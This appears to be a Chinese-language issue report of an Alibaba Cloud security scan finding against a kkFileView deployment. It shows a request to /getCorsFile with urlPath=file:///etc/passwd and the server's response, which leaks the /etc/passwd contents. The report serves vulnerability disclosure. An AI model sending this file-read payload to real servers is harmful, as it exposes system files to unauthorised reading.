在阿里云部署的kkfileview,阿里云安全性扫描有漏洞
网络流量内容GET /getCorsFile?urlPath=file:///etc/passwd HTTP/1.1
Host: XXX.XXX.XXXX.XXX:80XX
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.6.2333.33 Safari/537.36 AliyunTaiShiGanZhi https://www.aliyun.com/product/sas
Accept-Encoding: gzip, deflate
Accept: /
Connection: keep-alive
Accept-Language: zh-CN,zh;q=0.8
网络流量内容HTTP/1.1 200 OK
Date: Wed, 29 Mar 2023 19:45:23 GMT
Content-Length: 1044
root❌0:0:root:/root:/bin/bash bin❌1:1:bin:/bin:/sbin/nologin daemon❌2:2:daemon:/sbin:/sbin/nologin adm❌3:4:adm:/var/adm:/sbin/nologin lp❌4:7:lp:/var/spool/lpd:/sbin/nologin sync❌5:0:sync:/sbin:/bin/sync shutdown❌6:0:shutdown:/sbin:/sbin/shutdown halt❌7:0:halt:/sbin:/sbin/halt mail❌8:12:mail:/var/spool/mail:/sbin/nologin operator❌11:0 perator:/root:/sbin/nologin games❌12 |
